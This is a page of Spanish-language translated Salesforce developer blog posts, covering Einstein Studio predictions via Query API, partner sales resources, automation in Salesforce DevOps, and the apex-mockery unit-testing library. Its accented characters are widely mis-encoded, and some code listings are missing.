Utilice an谩lisis ad hoc para obtener predicciones

Query API es otra forma r谩pida de obtener puntajes de predicci贸n para los datos que residen en Data Cloud. Con Query API, puede usar el punto final de inferencia y funciones de predicci贸n de llamadas para probar el punto final.

Para obtener instrucciones sobre el uso de acciones invocables en QueryAPI, consulte la Ayuda de Salesforce .

Conclusi贸n

Einstein Studio es una plataforma de IA f谩cil de usar que permite a los equipos de ciencia e ingenier铆a de datos crear, entrenar e implementar modelos de IA utilizando plataformas externas y datos en Data Cloud. Las plataformas externas incluyen Amazon SageMaker, Google Cloud Vertex AI y otros servicios de IA predictivos o generativos. Una vez que est茅 listo, puede utilizar los modelos de IA en tiempo real para impulsar cualquier aplicaci贸n de ventas, servicios, marketing, comercio y otras en Salesforce.

Recursos adicionales

Sobre el Autor

Daryl Martis es el Director de Producto de Salesforce para Einstein. Tiene m谩s de 10 a帽os de experiencia en la planificaci贸n, creaci贸n, lanzamiento y gesti贸n de soluciones de clase mundial para clientes empresariales, incluidas soluciones de inteligencia artificial y aprendizaje autom谩tico y en la nube. Anteriormente trabaj贸 en la industria de servicios financieros en la ciudad de Nueva York. S铆guelo en LinkedIn o Twitter .

Obtenga las 煤ltimas publicaciones de blog de desarrolladores de Salesforce y episodios de podcast a trav茅s de Slack o RSS.

Agregar a Slack Suscr铆bete a RSS

Continue reading

Sube de nivel como socio de Salesforce 鈽侊笍

Sube de nivel como socio de Salesforce 鈽侊笍

Esta es una traducci贸n que desde EGA Futura ofrecemos como cortes铆a a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoam茅rica .

El enlace a la publicaci贸n original, lo encontrar谩s al final de este art铆culo.

Cuando nuestros socios tienen 茅xito, tenemos 茅xito. Como socio de confianza, tiene la oportunidad de desbloquear los activos de ventas, la propiedad intelectual, las mejores pr谩cticas, las historias de los clientes, el asesoramiento personalizado y nuestra metodolog铆a de lanzamiento de Salesforce. Esto es todo lo que brindamos a nuestros equipos de ventas internos de Salesforce, entregado en un formato interactivo y atractivo.

鈥淣uestros socios juegan un papel fundamental para ayudar a nuestros clientes a escalar capacidades, innovar y tener 茅xito con Salesforce鈥, dice Steve Corfield, vicepresidente ejecutivo de alianzas globales, canales y productos emergentes de Salesforce.

Comience a aprender con Partner Learning Camp

Explore el principal destino de aprendizaje y ampl铆e sus capacidades t茅cnicas y de ventas para satisfacer las necesidades de los clientes ahora y en el futuro.

Aumentar la oportunidad de servicios para socios

Salesforce realiz贸 algunos cambios importantes este a帽o para optimizar las soluciones de lanzamiento al mercado. El primer gran cambio es la tecnolog铆a y la innovaci贸n de productos. Atr谩s quedaron los d铆as de almacenamiento en silos en la nube y la venta de miles de SKU. Ahora estamos vendiendo conjuntos de productos que est谩n dise帽ados para satisfacer las necesidades de audiencias espec铆ficas. El enfoque en las personas de la audiencia nos permite producir ofertas m谩s integradas y brindarles a los clientes oportunidades para desbloquear el Salesforce Customer 360 completo.

Ahora, es m谩s f谩cil que nunca vender a trav茅s de Customer 360. Eso significa mayores ingresos y menor p茅rdida de clientes para los socios. Hay un efecto multiplicador significativo cuando un cliente tiene m谩s de una nube. A medida que aumenta su participaci贸n en Salesforce, tambi茅n puede ver una marcada disminuci贸n en el desgaste.

Los socios son clave para el 茅xito del cliente. Cuando nuestros socios participan estrat茅gicamente en el ciclo de ventas:

  • Las tasas de ganancias son 36 veces m谩s altas
  • El precio de venta promedio se incrementa 2x
  • Los socios implementan en promedio 4,5 veces los ingresos por licencias a trav茅s de sus servicios con nuestros clientes

鈥淟os socios que brindan valor, innovaci贸n y crecimiento m谩s r谩pido desbloquean el tipo de confianza de nuestros clientes que conduce a relaciones m谩s profundas鈥, dice Corfield.

Haga crecer sus capacidades de ventas de Salesforce para impulsar su 茅xito

El verdadero 茅xito de ventas no se trata solo de cumplir con las cuotas o realizar transacciones r谩pidas. Se trata de construir relaciones s贸lidas y duraderas con los clientes. Esto significa comprender sus necesidades 煤nicas y brindar soluciones personalizadas que agreguen valor y resuelvan los desaf铆os comerciales.

Salesforce tiene una gran cantidad de recursos para ayudarlo sin importar su rol de vendedor. Elija entre seminarios web interactivos breves y cursos a pedido en Partner Learning Camp (PLC). Disponibles para todos los socios de Salesforce, estos recursos est谩n dise帽ados para ayudarlo a impulsar el 茅xito de las ventas a lo largo del ciclo de vida del cliente.

Generaci贸n de demanda: aprenda el valor de Salesforce y obtenga informaci贸n sobre compradores 煤nicos con los seminarios web Sales Messaging 101 . Luego, ampl铆e sus conocimientos en el seminario web Creaci贸n de proyectos y calificaci贸n de clientes potenciales . Aprender谩 c贸mo comprender los puntos d茅biles de su cliente, involucrar a sus tomadores de decisiones y hacer avanzar la oportunidad.

Progresi贸n del trato: una vez que tenga una cartera saludable de clientes potenciales, es hora de sobresalir en el lanzamiento. Sales Kickstart ofrece una clase magistral completa para ayudarlo a perfeccionar su presentaci贸n. Durante tres medios d铆as, Kickstart ofrece capacitaci贸n personalizada para dar forma a su marco de presentaci贸n, ayudarlo a contar historias de clientes y vender en Customer 360. Esta capacitaci贸n tambi茅n est谩 disponible a pedido en PLC.

Entrada al mercado repetible: las personas que demuestren liderazgo en ventas en el ecosistema de socios pueden ser invitadas a convertirse en campeones de ventas de Salesforce . Es una oportunidad para obtener acceso a asesoramiento personalizado, preparaci贸n de lanzamientos y comentarios. En su tercer a帽o, Salesforce ha ayudado a su grupo 茅lite de campeones a obtener millones de d贸lares en proyectos. Los campeones gu铆an a los clientes sobre las opciones tecnol贸gicas correctas para el 茅xito y los ayudan a superar los desaf铆os comerciales y del mercado.

Reciba recompensas por enviar clientes potenciales

Cierre tratos m谩s r谩pido y a una tasa m谩s alta, desbloquee los beneficios de los socios, gane tarifas de referencia y desarrolle una asociaci贸n s贸lida con Salesforce.

Complemente sus capacidades con recursos t茅cnicos y de marketing  

Ampl铆e el impacto de sus capacidades de ventas de Salesforce aprovechando los siguientes recursos. Al hacerlo, desarrollar谩 sus capacidades t茅cnicas, acceder谩 a recursos de marketing y capacitaci贸n, y aprender谩 c贸mo llegar a sus clientes en el momento y lugar correctos.

Desarrolle experiencia t茅cnica: acceda a cursos y planes de estudios para mejorar sus capacidades t茅cnicas . Sum茅rjase en la capacitaci贸n disponible a trav茅s de Trailhead, Trailhead Academy, credenciales de Salesforce y Partner Learning Camp. Acceda a cursos espec铆ficos de funciones, como talleres impartidos por ingenieros de soluciones, para ingenieros de soluciones.

Llegue a sus clientes en el momento y el lugar correctos: el Centro de marketing para socios es una biblioteca de materiales gratuitos de marketing y ventas para ayudarlo a impulsar la demanda. Acceda a contenido gratuito, preconstruido y personalizable basado en la personalidad del comprador. Encontrar谩 recursos como libros de jugadas de campa帽a, copia de correo electr贸nico, mazos de ventas, guiones de llamadas y m谩s.

El programa de marketing de AppExchange puede ayudarlo a generar demanda, impulsar el 茅xito de los clientes y mejorar la visibilidad. Adem谩s, obtendr谩 oportunidades de marketing conjunto llave en mano con Salesforce.

Accelerate Grow puede ofrecerle m谩s entrenamiento pr谩ctico. Este programa acelerador virtual de 9 semanas puede ayudarlo a salir al mercado m谩s r谩pido y escalar el 茅xito de su empresa. Tendr谩 acceso a revisiones de listados personalizados, sesiones interactivas dirigidas por expertos y aprendizajes a pedido.

Ampl铆e sus operaciones de reventa: los revendedores pueden obtener una vista tras bambalinas sobre pron贸sticos, informes y el lado operativo de la gesti贸n del negocio. Esto est谩 disponible como un Bootcamp de reventa (que incluye Sales Kickstart) o como un taller de operaciones de reventa independiente.

Como socio de Salesforce, su excelencia en ventas impulsa la excelencia de la empresa. Puede maximizar el valor de su asociaci贸n desbloqueando un mundo de recursos para impulsar el 茅xito de ventas, expandir su base de clientes y prosperar en un mercado competitivo.

Salesforce est谩 abriendo camino hacia los 50.000 millones de d贸lares en ingresos para 2026. Somos la empresa de software empresarial de m谩s r谩pido crecimiento entre las cinco principales, y nuestros socios son fundamentales para ese crecimiento. Extienden la funcionalidad de la plataforma con aplicaciones personalizadas y ayudan a los clientes a implementar la tecnolog铆a. Junto con nuestros socios, crecemos, innovamos e invertimos en formas que ayudan a los clientes a transformar sus negocios.

Continue reading

Automatizaci贸n y Salesforce DevOps: una receta para el desarrollo acelerado

Automatizaci贸n y Salesforce DevOps: una receta para el desarrollo acelerado

脷ltima actualizaci贸n el 3 de julio de 2023 por Rakesh Gupta

En el acelerado mundo empresarial actual, la eficiencia en el desarrollo de software es vital. La automatizaci贸n ha surgido como una soluci贸n clave, agilizando los procesos para aumentar la productividad y liberar la innovaci贸n. Salesforce no es inmune a estos desaf铆os y complejidades de toda la industria.

Ingrese a DevOps. DevOps se ha convertido en un elemento esencial en el desarrollo de software, incluido Salesforce. Mediante la colaboraci贸n de desarrolladores, administradores y partes interesadas, Salesforce DevOps crea un entorno perfecto para la automatizaci贸n.

La combinaci贸n de automatizaci贸n y Salesforce DevOps cosecha m煤ltiples beneficios: menos errores, preparaci贸n m谩s r谩pida para el mercado, una canalizaci贸n de lanzamiento optimizada, menos repeticiones, calidad de c贸digo superior y mecanismos de retroalimentaci贸n m谩s fuertes. Mejora la eficiencia operativa y la velocidad de implementaci贸n en el ecosistema de Salesforce, fomentando un desarrollo 谩gil.

Este art铆culo explora la intersecci贸n de la automatizaci贸n y Salesforce DevOps, los beneficios de su sinergia y formas pr谩cticas de aplicarla para un desarrollo m谩s r谩pido en sus operaciones de Salesforce. Tanto si es un profesional de Salesforce como un novato, este art铆culo ofrece informaci贸n para reforzar su enfoque de DevOps de Salesforce con la automatizaci贸n.

Descripci贸n de DevOps de Salesforce

Antes de profundizar en c贸mo se cruzan Salesforce DevOps y la automatizaci贸n, es fundamental comprender lo que implica Salesforce DevOps.

DevOps, una combinaci贸n de ' Desarrollo ' y ' Operaciones ', es un conjunto de pr谩cticas dise帽adas para fusionar el desarrollo de software, el control de calidad y las operaciones de TI en un proceso unificado y fluido. En un contexto de Salesforce , DevOps es la uni贸n de estos principios con las s贸lidas capacidades de CRM de Salesforce, con el objetivo de facilitar procesos de desarrollo e implementaci贸n m谩s fluidos y r谩pidos.

En esencia, Salesforce DevOps incorpora principios como:

  1. Integraci贸n continua y entrega continua (CI/CD),
  2. responsabilidades compartidas,
  3. Acci贸n centrada en el cliente,
  4. Cultura de colaboraci贸n.

El objetivo es crear un entorno cohesivo donde los administradores, desarrolladores y otras partes interesadas puedan trabajar en armon铆a, lo que lleva a ciclos de desarrollo m谩s cortos, tiempo de comercializaci贸n m谩s r谩pido y software de alta calidad.

Sin embargo, a pesar de las ventajas de Salesforce DevOps, los desarrolladores a menudo enfrentan desaf铆os. Si bien es un activo, las caracter铆sticas integrales y la capacidad de personalizaci贸n de Salesforce pueden complicar el proceso de desarrollo e implementaci贸n .

Los desaf铆os difieren de un equipo a otro y de un caso de uso a otro, pero estos son algunos de los m谩s comunes:

  • Las diferencias en los entornos,
  • Administrar dependencias de c贸digo,
  • Manejo de metadatos,
  • Alinear el trabajo de diferentes equipos
  • Necesidad de mantener la calidad del c贸digo
  • Estabilidad del sistema mientras entrega a gran velocidad

Aqu铆 es donde la automatizaci贸n viene al rescate. La automatizaci贸n, en esencia, es el uso de la tecnolog铆a para realizar tareas con una intervenci贸n humana reducida. Cuando se aplica a Salesforce DevOps , puede aliviar significativamente estos desaf铆os.

Las pruebas automatizadas, por ejemplo, pueden mejorar la calidad del c贸digo al identificar errores al principio del proceso de desarrollo. Las implementaciones automatizadas pueden sincronizar metadatos y c贸digo en diferentes entornos, lo que reduce los errores de implementaci贸n. Del mismo modo, la automatizaci贸n de tareas repetitivas puede liberar el tiempo de los desarrolladores, lo que les permite concentrarse en actividades que agregan m谩s valor, como el desarrollo de funciones o el dise帽o de sistemas.

Adem谩s, la automatizaci贸n fomenta un proceso de desarrollo m谩s 谩gil, lo que permite actualizaciones peri贸dicas e incrementales en lugar de implementaciones r铆gidas de Salesforce. Este aspecto acorta el ciclo de desarrollo y facilita la reversi贸n de los cambios si algo sale mal, lo que aumenta la estabilidad general del sistema.

Aprovechamiento de la automatizaci贸n para el desarrollo acelerado de Salesforce

Acelerar el desarrollo de Salesforce a trav茅s de la automatizaci贸n implica identificar tareas manuales y repetitivas, implementar herramientas y marcos de automatizaci贸n adecuados y perfeccionar los procesos para mejorar la eficiencia y reducir los cuellos de botella. Profundicemos en cada una de estas 谩reas con m谩s detalle:

Identificaci贸n de tareas manuales y repetitivas

El primer paso hacia la automatizaci贸n es reconocer qu茅 tareas est谩n ralentizando su velocidad de desarrollo.

Estos t铆picamente incluyen:

  • Revisiones de c贸digo,
  • Pruebas,
  • Despliegue,
  • Configuraci贸n,
  • Migraci贸n de datos.

Suelen implicar procesos manuales tediosos que consumen tiempo y son propensos a errores. Al identificar estas tareas, puede identificar d贸nde la automatizaci贸n proporcionar谩 el mayor beneficio y tendr谩 un impacto significativo en la velocidad y la eficiencia de su desarrollo.

Implementaci贸n de herramientas y marcos de automatizaci贸n

Una vez que haya identificado las 谩reas que podr铆an beneficiarse de la automatizaci贸n, es hora de elegir e implementar las herramientas y los marcos adecuados. Salesforce ofrece varias funciones de automatizaci贸n integradas, como Apex y Salesforce Flow .

Sin embargo, otras herramientas pueden ser m谩s adecuadas para tareas complejas, como Salesforce DX para la gesti贸n del ciclo de vida del desarrollo, o Jenkins y CircleCI para la integraci贸n y entrega continuas. Al seleccionar estas herramientas, aseg煤rese de que se alineen con las habilidades de su equipo y los requisitos espec铆ficos de su entorno de Salesforce.

Optimizaci贸n de procesos para mejorar la eficiencia

La automatizaci贸n no se trata solo de herramientas y tecnolog铆a. Tambi茅n se trata de refinar sus procesos. Revise su flujo de trabajo de desarrollo actual para identificar posibles cuellos de botella y 谩reas de mejora.

Por ejemplo:

  1. 驴C贸mo se informan y rastrean los errores?
  2. 驴Con qu茅 frecuencia se realizan las implementaciones y c贸mo se programan?
  3. 驴C贸mo se recopilan los comentarios y c贸mo se act煤a en consecuencia?

Simplificar estos procesos puede mejorar dr谩sticamente la eficiencia de su equipo, permiti茅ndole aprovechar al m谩ximo sus esfuerzos de automatizaci贸n.

Vale la pena mencionar que los beneficios de la automatizaci贸n van m谩s all谩 de acelerar el desarrollo. La automatizaci贸n tambi茅n puede mejorar la calidad del c贸digo al detectar errores temprano a trav茅s de pruebas automatizadas. Puede reducir los errores de implementaci贸n al sincronizar el c贸digo en diferentes entornos.

Y al liberar a los desarrolladores de las tareas rutinarias, les permite concentrarse m谩s en el desarrollo de caracter铆sticas y el dise帽o del sistema, fomentando as铆 la innovaci贸n y mejorando el valor entregado a los usuarios finales.

Pruebas automatizadas para el desarrollo acelerado de Salesforce

Las pruebas son un componente crucial de cualquier ciclo de vida de desarrollo, y su importancia se multiplica para acelerar el desarrollo de Salesforce. Las pruebas peri贸dicas y exhaustivas ayudan a identificar errores y problemas desde el principio, lo que reduce el riesgo de reparaciones costosas y lentas en el futuro. Asegura la calidad y la confiabilidad de la aplicaci贸n, lo que a su vez contribuye a mejorar las experiencias de los usuarios y los resultados comerciales.

La automatizaci贸n puede potenciar este proceso de prueba. Las pruebas automatizadas implican el uso de herramientas de software para ejecutar pruebas y comparar los resultados reales con los resultados esperados. La implementaci贸n de una estrategia de prueba automatizada para las aplicaciones de Salesforce puede acelerar dr谩sticamente el proceso de desarrollo, lo que garantiza implementaciones m谩s r谩pidas, eficientes y confiables con menos errores.

Existen numerosas herramientas disponibles para pruebas automatizadas en Salesforce. Apex proporciona soporte integrado para pruebas unitarias, mientras que herramientas como Selenium, Provar y AssureClick pueden automatizar las pruebas de IU. Jest es una excelente opci贸n para probar Lightning Web Components (LWC). Al seleccionar una herramienta, considere las necesidades espec铆ficas de su aplicaci贸n, la experiencia de su equipo y la complejidad y frecuencia de sus requisitos de prueba.

Seguir las mejores pr谩cticas es esencial para aprovechar todo el potencial de las pruebas automatizadas. Estas son algunas de las mejores pr谩cticas para pruebas automatizadas eficientes y completas en el desarrollo de Salesforce:

  • Apunte a una alta cobertura de prueba : aseg煤rese de probar todas las partes de su aplicaci贸n. Salesforce requiere una cobertura de c贸digo m铆nima del 75 %, pero apuntar a una mayor cobertura puede brindar m谩s confianza en la confiabilidad de la aplicaci贸n.
  • Cree pruebas repetibles y aut贸nomas : las pruebas deben poder ejecutarse en cualquier entorno y no deben basarse en datos de pruebas anteriores. Esto garantiza que cada prueba valide una funci贸n espec铆fica de forma independiente.
  • Mantenga sus conjuntos de pruebas : a medida que su aplicaci贸n evolucione, sus pruebas tambi茅n deber铆an hacerlo. Revise y actualice regularmente sus pruebas para asegurarse de que reflejen con precisi贸n el estado actual de su aplicaci贸n.
  • Implemente diferentes niveles de prueba : combine pruebas unitarias, pruebas de integraci贸n y pruebas de interfaz de usuario para validar todos los aspectos de su aplicaci贸n. Cada nivel de prueba proporciona una perspectiva diferente sobre la funcionalidad de la aplicaci贸n.
  • Priorizar la legibilidad de la prueba : las pruebas a menudo sirven como documentaci贸n, explicando lo que se supone que debe hacer una parte del c贸digo. Aseg煤rese de que sus pruebas est茅n bien estructuradas y claramente escritas para que sean f谩ciles de entender para los dem谩s.
  • Incorpore las pruebas al principio del proceso de desarrollo : no espere hasta el final del ciclo de desarrollo para comenzar las pruebas. La incorporaci贸n de pruebas de manera temprana y frecuente le permite detectar y solucionar problemas r谩pidamente.

Integraci贸n e implementaci贸n continuas con automatizaci贸n

La integraci贸n continua y la implementaci贸n continua (CI/CD) forman un pilar central de Salesforce DevOps. CI/CD est谩 dise帽ado para reducir errores y acelerar el desarrollo a trav茅s de la integraci贸n continua de c贸digo y procesos de implementaci贸n automatizados y consistentes.

En el contexto de Salesforce, CI fusiona peri贸dicamente los cambios de c贸digo en un repositorio compartido, a menudo varias veces al d铆a. Cada integraci贸n se verifica autom谩ticamente mediante la creaci贸n de la aplicaci贸n y la ejecuci贸n de pruebas, lo que garantiza que los nuevos cambios se integren perfectamente con el c贸digo existente y no introduzcan errores.

Por otro lado, CD implementa autom谩ticamente esos cambios en la producci贸n, lo que garantiza que las nuevas caracter铆sticas, configuraciones y mejoras lleguen a los usuarios finales lo m谩s r谩pido posible. En Salesforce, CD puede implicar la implementaci贸n de cambios en diferentes entornos, como entornos de desarrollo, prueba, ensayo y producci贸n.

La automatizaci贸n es clave para lograr procesos impecables de CI/CD de Salesforce. A trav茅s de la automatizaci贸n, puede optimizar y estandarizar los pasos involucrados en:

  • Creaci贸n, prueba e implementaci贸n de aplicaciones de Salesforce,
  • Reducir el potencial de error humano
  • Acelerar el ciclo de desarrollo general.

La automatizaci贸n del proceso de compilaci贸n garantiza que los cambios en el c贸digo se integren y validen de manera constante. Las pruebas automatizadas, como comentamos anteriormente, verifican la integridad y la calidad del nuevo c贸digo. La automatizaci贸n del proceso de implementaci贸n ayuda a sincronizar el c贸digo y los cambios de configuraci贸n en diferentes entornos, lo que garantiza que todos los equipos de DevOps trabajen con la versi贸n m谩s reciente y precisa de la aplicaci贸n.

Control de versiones y automatizaci贸n de la gesti贸n de cambios

En el desarrollo de Salesforce, el control de versiones y la gesti贸n de cambios son fundamentales para mantener la integridad, coherencia y calidad de su aplicaci贸n.

El control de versiones, una parte integral del desarrollo de software, implica administrar y rastrear diferentes versiones de su base de c贸digo. Le permite ver los cambios a lo largo del tiempo, volver a las versiones anteriores cuando sea necesario y administrar el c贸digo de varios desarrolladores al mismo tiempo.

La gesti贸n de cambios se refiere a la gesti贸n y el seguimiento de los cambios del sistema, incluidos los cambios de configuraci贸n, las modificaciones de c贸digo y las implementaciones de nuevas funciones.

La automatizaci贸n de estos procesos puede mejorar su eficiencia y confiabilidad en el desarrollo de Salesforce.

  1. El control de versiones automatizado permite una integraci贸n de c贸digo m谩s fluida de diferentes desarrolladores, lo que reduce el riesgo de conflictos y errores.
  2. La gesti贸n de cambios automatizada asegura que todas las modificaciones a su sistema sean rastreadas y verificadas con precisi贸n, mejorando la responsabilidad y facilitando el diagn贸stico de cualquier problema que surja.

Varias herramientas pueden ayudar a automatizar el control de versiones y la gesti贸n de cambios en Salesforce. Los sistemas de control de versiones (VCS) como Git permiten un control de versiones efectivo. Facilita el seguimiento de los cambios en la base del c贸digo, lo que ayuda a mantener la integridad del c贸digo.

Las herramientas de DevOps como Copado o Gearset pueden ayudar a automatizar el seguimiento y la implementaci贸n de cambios en diferentes entornos para la gesti贸n de cambios. Brindan una visibilidad integral de su historial de cambios, lo que le permite administrar los cambios de manera m谩s efectiva y mantener la estabilidad de su aplicaci贸n.

Automatizaci贸n de la supervisi贸n y el tratamiento de errores

En el 谩mbito vertiginoso del desarrollo de Salesforce, el papel de la automatizaci贸n se extiende m谩s all谩 de la creaci贸n, prueba e implementaci贸n. El monitoreo automatizado y el manejo de errores son igualmente importantes para mantener la salud de la aplicaci贸n y corregir r谩pidamente cualquier problema.

El monitoreo automatizado implica el uso de herramientas para realizar un seguimiento constante del rendimiento, el uso y el estado general de sus aplicaciones de Salesforce. Este enfoque proactivo permite a los equipos de desarrollo identificar y abordar posibles problemas antes de que afecten a los usuarios.

El manejo proactivo de errores va de la mano con el monitoreo automatizado. En lugar de esperar a que se informen los problemas, el manejo proactivo de errores implica el uso de sistemas automatizados para identificar y, a menudo, resolver los problemas tan pronto como ocurran. Las notificaciones de error automatizadas aseguran que su equipo est茅 al tanto de cualquier problema al instante, lo que permite una respuesta r谩pida, minimiza el tiempo de inactividad y reduce la posibilidad de errores costosos.

La implementaci贸n de estas herramientas de automatizaci贸n en Salesforce DevOps implica el uso estrat茅gico de recursos como Monitoreo de eventos de Salesforce, que proporciona un flujo de eventos de auditor铆a de aplicaciones de su organizaci贸n, y herramientas de Monitoreo y advertencia de errores, que pueden notificarle autom谩ticamente sobre errores o excepciones.

Conclusi贸n

La automatizaci贸n combinada con las pr谩cticas de Salesforce DevOps ofrece una poderosa estrategia para acelerar el desarrollo y mejorar la calidad del software. Es una receta para el 茅xito en el vertiginoso panorama digital actual.

Para implementar la automatizaci贸n en su desarrollo de Salesforce, comience por identificar las tareas repetitivas que podr铆an automatizarse. Luego, implemente herramientas adecuadas para tareas como integraci贸n continua, pruebas automatizadas, control de versiones y monitoreo de aplicaciones. Agilice cualquier proceso manual junto con la implementaci贸n de estas herramientas, creando un flujo de trabajo de desarrollo eficiente y efectivo.

La adopci贸n de la automatizaci贸n en Salesforce DevOps acelera el desarrollo y refuerza la confiabilidad y el valor de sus aplicaciones. A medida que el ecosistema de Salesforce contin煤a evolucionando, el papel de la automatizaci贸n crecer谩 a煤n m谩s, dando forma al futuro del desarrollo de Salesforce.

Este art铆culo fue escrito por Sam Hops. Es redactora de contenido para una revista digital que cubre temas relacionados con el dise帽o, el comercio electr贸nico, el marketing digital y el esp铆ritu empresarial. Sam es un apasionado de todo lo relacionado con el marketing digital, pero tiene un inter茅s particular en el dise帽o gr谩fico, el SEO y las redes sociales.

Evaluaci贸n formativa:

隆Quiero saber de ti!

驴Qu茅 es una cosa que aprendiste de esta publicaci贸n? 驴C贸mo imagina aplicar este nuevo conocimiento en el mundo real? Si茅ntase libre de compartir en los comentarios a continuaci贸n.

Continue reading

Presentamos apex-mockery, una biblioteca de simulaci贸n de pruebas unitarias 鈽侊笍

Presentamos apex-mockery, una biblioteca de simulaci贸n de pruebas unitarias 鈽侊笍

Esta es una traducci贸n que desde EGA Futura ofrecemos como cortes铆a a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoam茅rica .

El enlace a la publicaci贸n original, lo encontrar谩s al final de este art铆culo.

Presentamos apex-mockery, una biblioteca de simulaci贸n de pruebas unitarias | Blog de desarrolladores de Salesforce

Escribir pruebas s贸lidas es crucial para crear aplicaciones comerciales confiables y eficientes. En esta publicaci贸n, haremos un repaso de las pruebas unitarias y presentaremos apex-mockery , una biblioteca liviana de pruebas unitarias de Apex que lo ayuda a escribir pruebas unitarias de Apex verdaderamente desacopladas usando simulacros y aserciones. Compartiremos ejemplos de c贸digo para ayudarlo a comprender c贸mo puede usar la biblioteca para crear pruebas unitarias f谩ciles de entender y de ejecuci贸n r谩pida.

Un repaso a las pruebas unitarias

Antes de echar un vistazo a la biblioteca de Apex-Mockery, demos un paso atr谩s y analicemos algunos de los conceptos b谩sicos de las pruebas unitarias desde un punto de vista independiente de la tecnolog铆a. Luego, veremos Apex y discutiremos por qu茅 la mayor铆a de nosotros deber铆a escribir pruebas unitarias en lugar de pruebas de integraci贸n.

Las pruebas unitarias est谩n en la base de la pir谩mide de prueba.

La ingenier铆a de software abarca m煤ltiples tipos de pruebas: unidad, integraci贸n, servicio, interfaz de usuario funcional, de extremo a extremo, aceptaci贸n del usuario y m谩s. Como dice Martin Fowler , podemos representar un buen equilibrio entre estos tipos de pruebas dentro del alcance de un proyecto represent谩ndolos como una pir谩mide.

Las etiquetas (tipos de prueba) pueden cambiar, pero el principio clave aqu铆 es que las pruebas que se ejecutan r谩pido y con frecuencia deben estar en la parte inferior de la pir谩mide. Estos son los m谩s f谩ciles de implementar y mantener (por lo que cuestan menos). Luego, a medida que subimos a la cima, aumentamos la complejidad y el costo: las pruebas se ejecutan m谩s lentamente y se vuelven m谩s dif铆ciles de implementar y mantener.

En el contexto de esta publicaci贸n y en aras de la brevedad, nos centraremos 煤nicamente en las pruebas unitarias. Estos son los primeros que debe implementar en cualquier proyecto, y deben ser una prioridad en su estrategia de prueba.

Por definici贸n, las pruebas unitarias est谩n destinadas a probar la menor cantidad de c贸digo (una unidad) de un proyecto. Las pruebas unitarias solo deben basarse en la l贸gica pura y estar completamente desvinculadas de sus dependencias (otras clases) y l铆mites (otros servicios, como almacenamiento de datos o servicios web). Las pruebas unitarias deben ejecutarse r谩pido; no requieren una configuraci贸n de prueba particular, como la inserci贸n de datos en la base de datos, y requieren que simule las dependencias de la clase bajo prueba.

Escribir pruebas unitarias de Apex en lugar de pruebas de integraci贸n

Apex se beneficia de una estrecha integraci贸n con la Plataforma de Salesforce y, si bien esta caracter铆stica es excelente para cosas como acceder r谩pida y f谩cilmente a la base de datos, difumina las l铆neas de separaci贸n de preocupaciones entre la l贸gica y los servicios. Como consecuencia, es muy f谩cil escribir pruebas de integraci贸n de Apex en lugar de pruebas unitarias. Por ejemplo, el c贸digo de Apex a menudo se prueba junto con la base de datos utilizando declaraciones @TestSetup y DML. Si bien estas pruebas de integraci贸n ayudan a lograr la cobertura, se basan en la base de datos y, por lo tanto, requieren m谩s tiempo para ejecutarse que las pruebas unitarias "puras".

Como comparti贸 Mitch Spano en su presentaci贸n de pruebas unitarias puras de Apex , la mayor铆a de las veces, no es necesario confiar en las pruebas de integraci贸n para probar capas de software de alto nivel, como controladores LWC, servicios y capas de aplicaci贸n. Gracias a la API de Stub de Apex lanzada en Spring '17, los desarrolladores pueden romper con esas dependencias en el contexto de las pruebas mediante la creaci贸n de su propia biblioteca/marco de pruebas unitarias o el uso de uno existente como apex-mockery.

Presentamos la burla del 谩pice

Como parte del trabajo de ingenier铆a de Salesforce, est谩bamos desarrollando un paquete administrado internamente y necesit谩bamos una biblioteca para escribir pruebas unitarias. Quer铆amos escribir pasos simples de "arreglar" (como en el patr贸n Arrange-Act-Assert ), escribir afirmaciones comprensibles y burlarnos de nuestras dependencias. Buscamos en todo el ecosistema una biblioteca f谩cil de leer y bien probada que pudi茅ramos usar para crear nuestro producto, pero no encontramos una combinaci贸n perfecta, por lo que decidimos escribir la nuestra. Est谩bamos tan contentos con la implementaci贸n final de la biblioteca que decidimos lanzarla como c贸digo abierto con el nombre apex-mockery .

La biblioteca apex-mockery proporciona una biblioteca de simulaci贸n simple, liviana y f谩cil de leer para Apex creada con la API Stub. La biblioteca est谩 dise帽ada para que sea f谩cil de usar y brinde la mejor experiencia de desarrollador posible al generar simulacros y ap茅ndices, configurar esp铆as y escribir aserciones.

Lo guiaremos a trav茅s de un escenario de muestra para que pueda comprender el poder de la biblioteca con algunos ejemplos pr谩cticos. Luego, le mostraremos c贸mo puede escribir pruebas para este proyecto de muestra en tres pasos:

  1. Crear simulacros y esp铆as de m茅todos.
  2. M茅todos de espionaje de trozo
  3. escribir afirmaciones

Ejemplo de escenario: pedidos de panader铆a y entrega

Considere el siguiente escenario de ejemplo: una panader铆a toma pedidos de pasteler铆a y planifica las entregas utilizando un servicio dedicado. Los 煤nicos datos que estamos considerando en el contexto de este escenario son los nombres de los pasteles y su fecha de entrega.

A continuaci贸n se muestra la implementaci贸n b谩sica de nuestro escenario de panader铆a (el c贸digo completo est谩 disponible en el repositorio del proyecto ).

Pasteler铆a.cls

DeliveryService.cls

DeliveryServiceImpl.cls

Confirmaci贸n de pedido.cls

Panader铆a.cls

Ahora que hemos echado un vistazo a nuestro proyecto de muestra, echemos un vistazo a c贸mo podr铆amos escribir pruebas para el m茅todo Bakery.order .

Paso 1: crea simulacros y esp铆as de m茅todos

Para funcionar, la clase Bakery necesita que se pase una instancia DeliveryService en su constructor. En un contexto de producci贸n, el servicio se proporciona con una instancia concreta DeliveryServiceImpl de la siguiente manera:

Sin embargo, en el contexto de las pruebas unitarias, no debe usar una instancia de servicio real para garantizar el desacoplamiento. En otras palabras, DelivertServiceImpl se probar谩 unitariamente por s铆 solo, por lo que no es necesario que pruebe las dos clases integradas juntas. Puede reemplazar la dependencia del servicio con un simulacro que implemente la interfaz DeliverService .

As铆 es como puede crear e inyectar f谩cilmente un simulacro de este tipo, gracias a apex-mockery:

Luego, su prueba necesita un esp铆a, para que pueda controlar el comportamiento del m茅todo planDelivery y ejecutar aserciones en sus llamadas.

Ahora que tiene un servicio simulado y un esp铆a en su m茅todo planDelivery , veamos c贸mo puede configurar su esp铆a y ejecutar aserciones en 茅l.

Paso 2: m茅todos de espionaje de trozo

Una vez que tenga una instancia simulada, puede controlar c贸mo se comportan sus m茅todos controlando sus valores de retorno y lanzando excepciones.

